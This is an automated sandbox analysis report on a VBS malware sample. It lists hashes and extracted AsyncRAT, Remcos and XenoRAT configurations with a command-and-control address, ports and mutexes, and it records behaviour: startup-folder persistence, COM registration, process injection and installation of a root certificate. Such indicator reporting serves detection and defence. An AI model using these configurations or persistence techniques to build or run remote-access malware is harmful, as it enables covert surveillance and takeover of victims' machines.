asyncrat | d67ec67aea3e158c8a167d39329491e56e6fdeb5f52c941767624287d5cf6128

Analysis

max time kernel
1799s
max time network
1800s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
31-03-2024 01:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

IMGES3.vbs
Size

111KB
MD5

1cd6415a95aade92977e47bfe9b630a6
SHA1

db3b582e59371bd1bebdda59678ec39c68d928bb
SHA256

84173441b7c16b960ee4e1532ae137955c12d0250696694405683a52e36920e6
SHA512

31b6cd53e2bfd3b0ef935721ea4ce6b3c4674badfe00dd173a6fe54507a16f245d989dd6efd420f495e095f58dd0dfdec6d3da35cd2d197d6126a69fcd3f9bbd
SSDEEP

1536:563LRV0ubIGkikGkFjGkikGkKEt0eEKU+kCKGWGPrbrbTDDpOAWGPrbrbTDDpDFW:+VJVkhbAme

Score

10^/10

asyncrat remcos xenorat aus cadaaaa222 newsss niceeeeeeeeeeeeee persistence rat trojan

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

CAdaaaa222

141.95.84.40:6262

Mutex

qw123123ecasdzcxqwe

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

remcos

Botnet

Newsss

141.95.84.40:4090

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
awcvvwvvwa-MZS2PC
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Remcos
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

remcos

Botnet

NICEEEEEEEEEEEEEE

141.95.84.40:3939

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
acwaw2-S0GXDB
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

xenorat

141.95.84.40

Mutex

asasasasa_nd891332d

Attributes

delay
5000
install_path
nothingset
port
4444
startup_name
nothingset

Extracted

Family

remcos

Botnet

AUS

141.95.84.40:3636

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
asasasasasadtssrsar-SCM43H
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
XenorRat
XenorRat is a remote access trojan written in C#.
trojan rat xenorat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	3620	WScript.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	WSCRIPT.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 8 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hvnc.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hvnc.vbs	WScript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aw.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aw.vbs	WScript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mia Khlifa OnlyFans.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mia Khlifa OnlyFans.vbs	WScript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\awkey.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\awkey.vbs	WScript.exe

Loads dropped DLL 23 IoCs

pid	Process
4028	regsvr32.exe
4060	WSCRIPT.EXE
4780	regsvr32.exe
3112	regsvr32.exe
3904	regsvr32.exe
4264	WScript.exe
3736	regsvr32.exe
3924	regsvr32.exe
1832	regsvr32.exe
2892	WScript.exe
4372	regsvr32.exe
4860	regsvr32.exe
3508	regsvr32.exe
3916	regsvr32.exe
1696	WScript.exe
712	regsvr32.exe
4640	regsvr32.exe
4060	regsvr32.exe
2916	regsvr32.exe
2504	WScript.exe
4432	regsvr32.exe
3376	regsvr32.exe
1060	regsvr32.exe

Registers COM server for autorun 1 TTPs 36 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe

Suspicious use of SetThreadContext 18 IoCs

description	pid	Process	procid_target
PID 4060 set thread context of 2304	4060	WSCRIPT.EXE	99
PID 4060 set thread context of 1832	4060	WSCRIPT.EXE	101
PID 4060 set thread context of 2680	4060	WSCRIPT.EXE	104
PID 4264 set thread context of 4120	4264	WScript.exe	115
PID 4264 set thread context of 1768	4264	WScript.exe	117
PID 4264 set thread context of 3204	4264	WScript.exe	119
PID 2892 set thread context of 3516	2892	WScript.exe	125
PID 2892 set thread context of 4032	2892	WScript.exe	127
PID 2892 set thread context of 2008	2892	WScript.exe	129
PID 2892 set thread context of 4600	2892	WScript.exe	133
PID 1696 set thread context of 1008	1696	WScript.exe	142
PID 1696 set thread context of 2484	1696	WScript.exe	144
PID 1696 set thread context of 1032	1696	WScript.exe	146
PID 1696 set thread context of 5104	1696	WScript.exe	150
PID 2504 set thread context of 4812	2504	WScript.exe	160
PID 2504 set thread context of 3600	2504	WScript.exe	162
PID 2504 set thread context of 4256	2504	WScript.exe	164
PID 2504 set thread context of 1180	2504	WScript.exe	166

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 6 IoCs

pid	pid_target	Process	procid_target
3184	2680	WerFault.exe	104
5032	2008	WerFault.exe	129
3116	2008	WerFault.exe	129
444	1032	WerFault.exe	146
1876	5104	WerFault.exe	150
4260	1032	WerFault.exe	146

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}"	regsvr32.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25	WScript.exe
